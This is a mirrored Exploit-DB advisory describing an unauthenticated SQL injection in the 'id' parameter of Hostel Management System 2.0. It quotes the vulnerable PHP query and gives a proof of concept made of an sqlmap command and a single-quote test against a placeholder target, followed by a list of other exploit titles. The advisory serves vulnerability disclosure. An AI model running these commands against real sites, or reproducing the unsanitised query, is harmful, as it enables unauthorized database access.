Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)

Exploit Database
100 阅读

作者： Enesdex

日期： 2020-06-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48542/

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server

--Vulnerable file /full-profile.php

--Vulnerable code;
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");

Id parameter's value is going into sql query directly!

--Proof Of Concept 
 
 sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" 
 OR
 http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error

last Exploits
Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)的更多信息

Symantec Web Gateway 5.0.3.18 – Arbitrary Password Change：
2Point Solutions – ‘cmspages.php’ SQL Injection：
Ulicms-2023.1 sniffing-vicuna – Stored Cross-Site Scripting (XSS)：
Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) – ‘WebShot’ Remote Code Execution：
Online Course Registration 2.0 – Authentication Bypass：
MediaInSpot CMS – Local File Inclusion (1)：
Drupal Module Drag & Drop Gallery 6.x-1.5 – ‘upload.php’ Arbitrary File Upload：
Frog CMS 0.9.5 – Cross-Site Scripting：